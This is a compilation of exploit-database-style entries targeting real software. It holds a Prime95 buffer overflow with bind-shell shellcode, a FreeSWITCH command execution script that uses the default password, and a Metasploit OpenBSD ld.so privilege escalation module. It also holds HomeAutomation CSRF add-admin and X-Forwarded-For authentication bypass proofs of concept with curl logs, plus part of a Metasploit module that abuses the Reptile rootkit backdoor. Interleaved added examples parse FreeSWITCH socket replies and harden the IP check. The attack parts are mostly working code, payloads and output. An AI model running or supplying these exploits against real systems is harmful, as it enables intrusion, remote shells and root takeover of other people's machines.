# Exploit Title: Prime95 Version 29.8 build 6 - Buffer Overflow (SEH)
# Date: 2019-12-22
# Vendor Homepage: https://www.mersenne.org
# Software Link: http://www.mersenne.org/ftp_root/gimps/p95v298b6.win32.zip
# Exploit Author: Achilles
# Tested Version: 29.8 build 6
# Tested on: Windows 7 x64
# 1.- Run python code: Prime95.py
# 2.- Open EVIL.txt and copy its content to the clipboard
# 3.- Open Prime95.exe and go to PrimeNet
# 4.- Paste the content of EVIL.txt into the field "Optional User ID and Optional Computer Name"
# 5.- Click Connection and paste the content of EVIL.txt into the field "Optional proxy Host"
# 6.- Press OK twice and you will have a bind shell on port 3110
# 7.- Greetings go: XiDreamzzXi, Metatron
#!/usr/bin/env python
import struct

buffer = "\x41" * 660
nseh = "\xeb\x06\x90\x90"  # jmp short 6
seh = struct.pack('<L', 0x6ee410b1)  # libhwloc-15.dll
nops = "\x90" * 20

# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python
# badchars "\x00\x0a\x0d"
shellcode = ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b"
"\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8"
"\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b"
"\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07"
"\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5"
"\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f"
"\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02"
"\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59"
"\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7"
"\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb"
"\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87"
"\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01"
"\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7"
"\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45"
"\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49"
"\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1"
"\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9"
"\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c"
"\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64"
"\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38"
"\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3"
"\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0"
"\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86"
"\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e"
"\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7"
"\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4"
"\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef"
"\x77\x03\x31\x3a")

payload = buffer + nseh + seh + nops + shellcode

try:
    f = open("Evil.txt", "w")
    print "[+] Creating %s bytes evil payload.." % len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
# Exploit Title: FreeSWITCH 1.10.1 - Command Execution
# Date: 2019-12-19
# Exploit Author: 1F98D
# Vendor Homepage: https://freeswitch.com/
# Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi
# Version: 1.10.1
# Tested on: Windows 10 (x64)
#
# FreeSWITCH listens on port 8021 by default and will accept and run commands sent to
# it after authenticating. By default commands are not accepted from remote hosts.
#
# -- Example --
# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
# Authenticated
# Content-Type: api/response
# Content-Length: 20
#
# nt authority\system
#
#!/usr/bin/python3
from socket import *
import sys

if len(sys.argv) != 3:
    print('Missing arguments')
    print('Usage: freeswitch-exploit.py <target> <cmd>')
    sys.exit(1)

ADDRESS = sys.argv[1]
CMD = sys.argv[2]
PASSWORD = 'ClueCon'  # default password for FreeSWITCH

s = socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))

response = s.recv(1024)
if b'auth/request' in response:
    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
    response = s.recv(1024)
    if b'+OK accepted' in response:
        print('Authenticated')
        s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
        response = s.recv(8096).decode()
        print(response)
    else:
        print('Authentication failed')
        sys.exit(1)
else:
    print('Not prompted for authentication, likely not vulnerable')
    sys.exit(1)
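The script above reads each reply with a single recv(), which only works when the whole response lands in one TCP segment. ESL frames every message as header lines, a blank line, then a body of exactly Content-Length bytes (the `Content-Length: 20` shown in the example output). The reader below is an added example, not part of the original exploit; it reassembles messages from that framing over a constructed byte stream that mirrors the three server replies the exploit depends on.

```python
"""Incremental parser for FreeSWITCH Event Socket (ESL) framing.

Added example, not part of the original exploit. ESL sends each message as
header lines, a blank line, then a body of exactly Content-Length bytes;
a single recv() can return part of a message or several at once, so a
reader has to reassemble frames rather than trust one read.
"""

# Constructed sample: the three server messages the exploit above depends on
# (auth prompt, reply to "auth", reply to "api system whoami"), concatenated
# as they would arrive on the wire. Body length 20 matches the example output.
SAMPLE_STREAM = (
    b"Content-Type: auth/request\n\n"
    b"Content-Type: command/reply\nReply-Text: +OK accepted\n\n"
    b"Content-Type: api/response\nContent-Length: 20\n\n"
    b"nt authority\\system\n"
)


def parse_esl_messages(data):
    """Split buffered bytes into complete ESL messages.

    Returns (messages, remainder): messages is a list of (headers, body)
    tuples, remainder is trailing data that still needs more input.
    """
    messages = []
    pos = 0
    while True:
        end = data.find(b"\n\n", pos)
        if end == -1:
            break  # header block not complete yet
        headers = {}
        for line in data[pos:end].decode("utf-8", "replace").split("\n"):
            name, sep, value = line.partition(":")
            if sep:
                headers[name.strip()] = value.strip()
        body_start = end + 2
        length = int(headers.get("Content-Length", "0"))
        if len(data) - body_start < length:
            break  # body not complete yet; keep the headers buffered too
        messages.append((headers, data[body_start:body_start + length]))
        pos = body_start + length
    return messages, data[pos:]


class EslReader:
    """Feed raw socket chunks in, get complete messages out."""

    def __init__(self):
        self._buf = b""

    def feed(self, chunk):
        self._buf += chunk
        messages, self._buf = parse_esl_messages(self._buf)
        return messages


def auth_required(messages):
    """True if the server opened with an auth/request, the state the script
    above checks for; a socket that never prompts is normally ACL-restricted."""
    return any(h.get("Content-Type") == "auth/request" for h, _ in messages)
```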
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'OpenBSD Dynamic Loader chpass Privilege Escalation',
      'Description'    => %q{
        This module exploits a vulnerability in the OpenBSD `ld.so`
        dynamic loader (CVE-2019-19726).

        The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH`
        environment variable when set with approximately `ARG_MAX` colons.

        This can be abused to load `libutil.so` from an untrusted path,
        using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid
        executable, resulting in privileged code execution.

        This module has been tested successfully on:

        OpenBSD 6.1 (amd64); and
        OpenBSD 6.6 (amd64)
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Qualys', # Discovery and exploit
          'bcoles'  # Metasploit
        ],
      'DisclosureDate' => '2019-12-11',
      'Platform'       => %w[bsd unix], # OpenBSD
      'Arch'           => [ARCH_CMD],
      'SessionTypes'   => ['shell'],
      'References'     =>
        [
          ['CVE', '2019-19726'],
          ['EDB', '47780'],
          ['URL', 'https://blog.qualys.com/laws-of-vulnerabilities/2019/12/11/openbsd-local-privilege-escalation-vulnerability-cve-2019-19726'],
          ['URL', 'https://www.qualys.com/2019/12/11/cve-2019-19726/local-privilege-escalation-openbsd-dynamic-loader.txt'],
          ['URL', 'https://www.openwall.com/lists/oss-security/2019/12/11/9'],
          ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2019-19726/openbsd-dynamic-loader-chpass'],
          ['URL', 'https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/013_ldso.patch.sig']
        ],
      'Targets'        => [['Automatic', {}]],
      'DefaultOptions' =>
        {
          'PAYLOAD'  => 'cmd/unix/reverse',
          'WfsDelay' => 10
        },
      'DefaultTarget'  => 0))
    register_options [
      OptString.new('CHPASS_PATH', [true, 'Path to chpass', '/usr/bin/chpass'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def chpass_path
    datastore['CHPASS_PATH']
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def is_root?
    (cmd_exec('id -u').to_s.gsub(/[^\d]/, '') == '0')
  end

  def libutil_name
    return unless command_exists? 'readelf'

    cmd_exec('readelf -a /usr/sbin/pwd_mkdb').to_s.scan(/\[(libutil\.so\.[\d\.]+)\]/).flatten.first
  end

  def check
    patches = cmd_exec('syspatch -l').to_s
    patch = '013_ldso'

    if patches.include? patch
      vprint_error "Patch #{patch} has been installed. Target is not vulnerable."
      return CheckCode::Safe
    end

    vprint_good "Patch #{patch} is not present"

    unless command_exists? 'cc'
      vprint_error 'cc is not installed'
      return CheckCode::Safe
    end

    print_good 'cc is installed'

    CheckCode::Detected
  end

  def exploit
    unless check == CheckCode::Detected
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    # Qualys set-uid shared object from https://www.openwall.com/lists/oss-security/2019/12/11/9
    lib_data = <<-EOF
    #include <paths.h>
    #include <unistd.h>

    static void __attribute__ ((constructor)) _init (void) {
        if (setuid(0) != 0) _exit(__LINE__);
        if (setgid(0) != 0) _exit(__LINE__);
        char * const argv[] = { _PATH_KSHELL, "-c", _PATH_KSHELL "; exit 1", NULL };
        execve(argv[0], argv, NULL);
        _exit(__LINE__);
    }
    EOF

    libs = []
    lib = libutil_name
    if lib
      libs << lib
      print_good "Found libutil.so name: #{lib}"
    else
      libs << 'libutil.so.12.1'
      libs << 'libutil.so.13.1'
      print_warning "Could not determine libutil.so name. Using: #{libs.join(', ')}"
    end

    lib_src_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}.c"
    upload lib_src_path, lib_data

    libs.each do |lib_name|
      lib_path = "#{base_dir}/#{lib_name}"
      print_status "Compiling #{lib_path} ..."
      output = cmd_exec "cc -fpic -shared -s -o #{lib_path} #{lib_src_path} -Wall"
      register_file_for_cleanup lib_path

      unless output.blank?
        print_error output
        fail_with Failure::Unknown, "#{lib_path}.c failed to compile"
      end
    end

    # Qualys exploit from https://www.openwall.com/lists/oss-security/2019/12/11/9
    exploit_data = <<-EOF
    #include <string.h>
    #include <sys/param.h>
    #include <sys/resource.h>
    #include <unistd.h>

    int
    main(int argc, char * const * argv)
    {
    #define LLP "LD_LIBRARY_PATH=."
        static char llp[ARG_MAX - 128];
        memset(llp, ':', sizeof(llp)-1);
        memcpy(llp, LLP, sizeof(LLP)-1);
        char * const envp[] = { llp, "EDITOR=echo '#' >>", NULL };

    #define DATA (ARG_MAX * sizeof(char *))
        const struct rlimit data = { DATA, DATA };
        if (setrlimit(RLIMIT_DATA, &data) != 0) _exit(__LINE__);

        if (argc <= 1) _exit(__LINE__);
        argv += 1;
        execve(argv[0], argv, envp);
        _exit(__LINE__);
    }
    EOF

    exploit_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
    upload "#{exploit_path}.c", exploit_data

    print_status "Compiling #{exploit_path} ..."
    output = cmd_exec "cc -s #{exploit_path}.c -o #{exploit_path} -Wall"
    register_file_for_cleanup exploit_path

    unless output.blank?
      print_error output
      fail_with Failure::Unknown, "#{exploit_path}.c failed to compile"
    end

    payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
    upload payload_path, "#!/bin/sh\n#{payload.encoded}\n"
    chmod payload_path

    print_status 'Launching exploit...'
    output = cmd_exec("cd #{base_dir};echo '#{payload_path}&exit'|#{exploit_path} #{chpass_path}")
    output.each_line { |line| vprint_status line.chomp }
  end
end
# Exploit: HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin)
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: Tom Rosenback and Daniel Malmgren
# Product web page: http://karpero.mine.nu/ha/
# Affected version: 3.3.2
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
# Advisory ID: ZSL-2019-5558
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5558.php
HomeAutomation v3.3.2 CSRF Add Admin Exploit
Vendor: Tom Rosenback and Daniel Malmgren
Product web page: http://karpero.mine.nu/ha/
Affected version: 3.3.2
Summary: HomeAutomation is an open-source web interface and scheduling solution.
It was initially made for use with the Telldus TellStick, but is now based on a
plugin system and, besides the TellStick, also supports Crestron,
OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
etc.) based on an advanced scheduling system, taking into account things like
measurements from various sensors. With the houseplan view you can get a simple
overview of the status of your devices at their location in your house.
Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. This can
be exploited to perform certain actions with administrative privileges if a logged-in
user visits a malicious web site.
Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
Apache/2.4.29 (Ubuntu)
PHP/7.4.0RC4
PHP/7.3.11
PHP 7.2.24-0ubuntu0.18.04.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5558
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5558.php
06.11.2019
--
<html>
<body>
<form action="http://localhost/homeautomation_v3_3_2/?page=conf-usercontrol" method="POST">
<input type="hidden" name="id" value="-1" />
<input type="hidden" name="action" value="save" />
<input type="hidden" name="editable" value="2" />
<input type="hidden" name="username" value="testingus" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="firstname" value="Tester" />
<input type="hidden" name="lastname" value="Testovski" />
<input type="hidden" name="email" value="test@zeroscience.mk" />
<input type="hidden" name="userlevel" value="3" />
<input type="hidden" name="save" value="Save" />
<input type="submit" value="Addmoi" />
</form>
</body>
</html>
# Exploit: HomeAutomation 3.3.2 - Authentication Bypass
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: Tom Rosenback and Daniel Malmgren
# Product web page: http://karpero.mine.nu/ha/
# Affected version: 3.3.2
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
# Advisory ID: ZSL-2019-5557
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5557.php
HomeAutomation v3.3.2 Authentication Bypass Exploit
Vendor: Tom Rosenback and Daniel Malmgren
Product web page: http://karpero.mine.nu/ha/
Affected version: 3.3.2
Summary: HomeAutomation is an open-source web interface and scheduling solution.
It was initially made for use with the Telldus TellStick, but is now based on a
plugin system and, besides the TellStick, also supports Crestron,
OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
etc.) based on an advanced scheduling system, taking into account things like
measurements from various sensors. With the houseplan view you can get a simple
overview of the status of your devices at their location in your house.
Desc: The application suffers from an authentication bypass vulnerability. Spoofing
the client IP address via the X-Forwarded-For header with a local (loopback) address
value makes the application treat the request as local and take its autologin path,
allowing remote control of the smart home solution.
===============================================================================
/modules/login/login.module.php:
--------------------------------
19: if(!defined("HomeAutomationIncluded")) { die("HomeAutomation: Direct access not premitted"); }
20:
21: if($_SESSION[CFG_SESSION_KEY]["userlevel"] < 1 && $action == "default" && isIpLocal() && getFormVariable("autologin", "") == "")
22: {
23: // if user is not logged in and action is default, user is visiting locally and autologin is NOT set, allow autologin.
24: $action = "login";
25: }
26:
27: ?>
===============================================================================
/functions.php:
---------------
733: function isIpLocal() {
734:
735: if(substr(getIpAddress(), 0, 4) == "127.") {
736: return true;
737: }
738:
739: $isIpLocal = false;
740:
741: $localip = $_SESSION[CFG_SESSION_KEY]["settings"]["localip"];
742:
743: $localnets = explode(";", $localip);
744: foreach($localnets as $localnet) {
745: list($localnet, $localmask) = explode("/", $localnet);
746: if($localmask == "") {
747: $localmask = 32;
748: }
749: if($localmask == "" || $localmask > 32 || $localmask < 0) {
750: $localmask = 32;
751: }
752:
753: // $mask = $localmask;
754:
755: $localnet = ip2long($localnet);
756: $localmask = ~((1 << (32-$localmask)) - 1);
757: $remoteip = ip2long(getIpAddress());
758: $maskedip = $remoteip & $localmask;
759: $maskednet = $localnet & $localmask;
760:
761: // echo "<br />localnet:";
762: // printf('%1$32b', $localnet);
763:
764: // echo "<br />localmask: (dec: ".$mask.")";
765: // printf('%1$32b', $localmask);
766:
767: // echo "<br />remoteip:";
768: // printf('%1$32b', $remoteip);
769:
770: // echo "<br />maskedip:";
771: // printf('%1$32b', $maskedip);
772:
773: // echo "<br />maskednet:";
774: // printf('%1$32b', $maskednet);
775:
776: if($maskedip == $maskednet) {
777: // echo "<br />maskedip == maskednet";
778: $isIpLocal = true;
779: break;
780: }
781: }
782: // $isIpLocal = false;
783: return $isIpLocal;
784: }
785:
786: function getIpAddress() {
787: return isset($_SERVER["HTTP_X_FORWARDED_FOR"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"];
788: }
===============================================================================
Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
Apache/2.4.29 (Ubuntu)
PHP/7.4.0RC4
PHP/7.3.11
PHP 7.2.24-0ubuntu0.18.04.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5557
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5557.php
06.11.2019
--
PoC auth bypass and arbitrary cookie setup grepping auth'd content view:
------------------------------------------------------------------------
root@kali:~/homeautomation# curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/index.php -H "X-Forwarded-For: 127.31.33.7" -vL --cookie "PHPSESSID=11111111110000000000666666" |grep Macros
* Trying 192.168.2.113...
* Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
* found 173 certificates in /etc/ssl/certs/ca-certificates.crt
* found 696 certificates in /etc/ssl/certs
* ALPN, offering h2
* ALPN, offering http/1.1
* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
* server certificate verification SKIPPED
* server certificate status verification SKIPPED
* common name: n28.nux.se (does not match '192.168.2.113')
* server certificate expiration date OK
* server certificate activation date OK
* certificate public key: RSA
* certificate version: #3
* subject: CN=n28.nux.se
* start date: Mon, 21 Oct 2019 12:18:27 GMT
* expire date: Sun, 19 Jan 2020 12:18:27 GMT
* issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3
* compression: NULL
* ALPN, server accepted to use http/1.1
> GET /index.php HTTP/1.1
> Host: 192.168.2.113
> User-Agent: ZSL/0.2 (SpoofDetect 1.0)
> Accept: */*
> Cookie: PHPSESSID=11111111110000000000666666
> X-Forwarded-For: 127.31.33.7
>
< HTTP/1.1 303 See Other
< Date: Wed, 20 Nov 2019 01:06:16 GMT
< Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
< X-Powered-By: PHP/7.3.11
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Strict-Transport-Security: max-age=63072000; includeSubdomains
< X-Frame-Options: DENY
< X-Content-Type-Options: nosniff
< Location: ./index.php?page=houseplan
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host 192.168.2.113 left intact
* Issue another request to this URL: 'https://192.168.2.113/index.php?page=houseplan'
* Found bundle for host 192.168.2.113: 0x55c160ef7c40 [can pipeline]
* Re-using existing connection! (#0) with host 192.168.2.113
* Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
> GET /index.php?page=houseplan HTTP/1.1
> Host: 192.168.2.113
> User-Agent: ZSL/0.2 (SpoofDetect 1.0)
> Accept: */*
> Cookie: PHPSESSID=11111111110000000000666666
> X-Forwarded-For: 127.31.33.7
>
< HTTP/1.1 200 OK
< Date: Wed, 20 Nov 2019 01:06:16 GMT
< Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
< X-Powered-By: PHP/7.3.11
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Strict-Transport-Security: max-age=63072000; includeSubdomains
< X-Frame-Options: DENY
< X-Content-Type-Options: nosniff
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
{ [6 bytes data]
* </li><li>| <a href="./index.php?page=macros">Macros</a>
Connection #0 to host 192.168.2.113 left intact
root@kali:~/homeautomation# curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/index.php -vL --cookie "PHPSESSID=11111111110000000000666666" |grep Macros
* Trying 192.168.2.113...
* Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
* found 173 certificates in /etc/ssl/certs/ca-certificates.crt
* found 696 certificates in /etc/ssl/certs
* ALPN, offering h2
* ALPN, offering http/1.1
* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
* server certificate verification SKIPPED
* server certificate status verification SKIPPED
* common name: n28.nux.se (does not match '192.168.2.113')
* server certificate expiration date OK
* server certificate activation date OK
* certificate public key: RSA
* certificate version: #3
* subject: CN=n28.nux.se
* start date: Mon, 21 Oct 2019 12:18:27 GMT
* expire date: Sun, 19 Jan 2020 12:18:27 GMT
* issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3
* compression: NULL
* ALPN, server accepted to use http/1.1
> GET /index.php HTTP/1.1
> Host: 192.168.2.113
> User-Agent: ZSL/0.2 (SpoofDetect 1.0)
> Accept: */*
> Cookie: PHPSESSID=11111111110000000000666666
>
< HTTP/1.1 200 OK
< Date: Wed, 20 Nov 2019 01:06:25 GMT
< Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
< X-Powered-By: PHP/7.3.11
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Strict-Transport-Security: max-age=63072000; includeSubdomains
< X-Frame-Options: DENY
< X-Content-Type-Options: nosniff
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
{ [6 bytes data]
</li><li>| <a href="./index.php?page=macros">Macros</a>
* Connection #0 to host 192.168.2.113 left intact
root@kali:~/homeautomation#
PoC auth bypass retrieving valid Cookie:
-----------------------------------------
root@kali:~/homeautomation# $(curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/?page=houseplan -L -H "X-Forwarded-For: 127.1.1.1" --cookie-jar cookies.txt -o /dev/null) ; echo -ne "Your cookie: " ;tail -c -27 cookies.txt
Your cookie: k4dic6crpr4d4u71tr13gvtmsv
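The two functions quoted from functions.php are the whole bypass: getIpAddress() prefers any X-Forwarded-For value over the TCP peer, and isIpLocal() then accepts a "127." prefix or a match against the configured localip nets. The following is an added example, not HomeAutomation's code: it re-implements that logic in Python so the spoofed-header case can be checked offline, and places a hardened variant beside it that only honours X-Forwarded-For from a configured reverse proxy. The addresses, header values and localip setting are constructed.

```python
"""Reproduce and harden the isIpLocal()/getIpAddress() logic quoted above.

Added example, not HomeAutomation's code: the PHP is re-implemented in
Python so the header-spoofing bypass can be checked offline, beside a
hardened variant. Addresses, headers and the localip setting are constructed.
"""
import ipaddress


def ip2long(ip):
    """PHP ip2long() equivalent for a dotted-quad IPv4 address."""
    return int(ipaddress.IPv4Address(ip))


def vulnerable_client_ip(headers, remote_addr):
    """Mirror of getIpAddress(): any X-Forwarded-For value wins over the peer."""
    return headers.get("X-Forwarded-For", remote_addr)


def vulnerable_is_ip_local(client_ip, localip_setting):
    """Mirror of isIpLocal(): '127.' prefix, else membership in the localip nets."""
    if client_ip[:4] == "127.":
        return True
    for entry in localip_setting.split(";"):
        net, _, mask = entry.partition("/")
        if not net:
            continue  # PHP would ip2long("") -> false; skipped here
        mask = int(mask) if mask else 32
        if mask > 32 or mask < 0:
            mask = 32
        maskbits = (~((1 << (32 - mask)) - 1)) & 0xFFFFFFFF
        if (ip2long(client_ip) & maskbits) == (ip2long(net) & maskbits):
            return True
    return False


def hardened_client_ip(headers, remote_addr, trusted_proxies=frozenset()):
    """Honour X-Forwarded-For only when the TCP peer is a known reverse proxy,
    and then use the address that proxy appended (the last one), never a
    value the client could have supplied itself."""
    xff = headers.get("X-Forwarded-For", "")
    if xff and remote_addr in trusted_proxies:
        return xff.split(",")[-1].strip()
    return remote_addr


def hardened_is_ip_local(client_ip, localip_setting):
    """Same policy expressed with the ipaddress module (no prefix string games)."""
    try:
        addr = ipaddress.ip_address(client_ip)
    except ValueError:
        return False
    if addr.is_loopback:
        return True
    for entry in localip_setting.split(";"):
        if not entry:
            continue
        try:
            net = ipaddress.ip_network(entry, strict=False)
        except ValueError:
            continue
        if addr in net:
            return True
    return False


def autologin_granted(headers, remote_addr, localip_setting,
                      hardened=False, trusted_proxies=frozenset()):
    """Would login.module.php's autologin branch treat this request as local?"""
    if hardened:
        ip = hardened_client_ip(headers, remote_addr, trusted_proxies)
        return hardened_is_ip_local(ip, localip_setting)
    ip = vulnerable_client_ip(headers, remote_addr)
    return vulnerable_is_ip_local(ip, localip_setting)


# Constructed scenario: LAN is 192.168.2.0/24, reverse proxy at 192.168.2.1,
# remote client on a TEST-NET address sending the header from the advisory.
LOCALIP_SETTING = "192.168.2.0/24"
TRUSTED_PROXIES = frozenset({"192.168.2.1"})
SPOOFED_HEADERS = {"X-Forwarded-For": "127.31.33.7"}
REMOTE_CLIENT = "203.0.113.5"
```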
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Reptile Rootkit reptile_cmd Privilege Escalation',
      'Description'    => %q{
        This module uses Reptile rootkit's `reptile_cmd` backdoor executable
        to gain root privileges using the `root` command.

        This module has been tested successfully with Reptile from `master`
        branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'f0rb1dd3n', # Reptile
          'bcoles'     # Metasploit
        ],
      'DisclosureDate' => '2018-10-29', # Reptile first stable release
      'References'     =>
        [
          ['URL', 'https://github.com/f0rb1dd3n/Reptile'],
          ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']
        ],
      'Platform'       => ['linux'],
      'Arch'           => [ARCH_X86, ARCH_X64],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['Auto', {}]],
      'Notes'          =>
        {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability'   => [ CRASH_SAFE ]
        },
      'DefaultTarget'  => 0))
    register_options [
      OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def reptile_cmd_path
    datastore['REPTILE_CMD_PATH']
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_chmodx(path, data)
    upload path, data
    chmod path
  end

  def check
    unless executable? reptile_cmd_path
      vprint_error "#{reptile_cmd_path} is not executable"
      return CheckCode::Safe
    end

    vprint_good "#{reptile_cmd_path} is executable"

    res = cmd_exec("echo id|#{reptile_cmd_path} root").to_s.strip
    vprint_status "Output: #{res}"

    if res.include?('You have no power here!')
      vprint_error 'Reptile kernel module is not loaded'
      return CheckCode::Safe
    end

    unless res.include?('root')
      vprint_error 'Reptile is not installed'
      return CheckCode::Safe
    end

    vprint_good 'Reptile is installed and loaded'

    CheckCode::Vulnerable
  end

  def exploit
    unless check == CheckCode::Vulnerable
      unless datastore['ForceExploit']
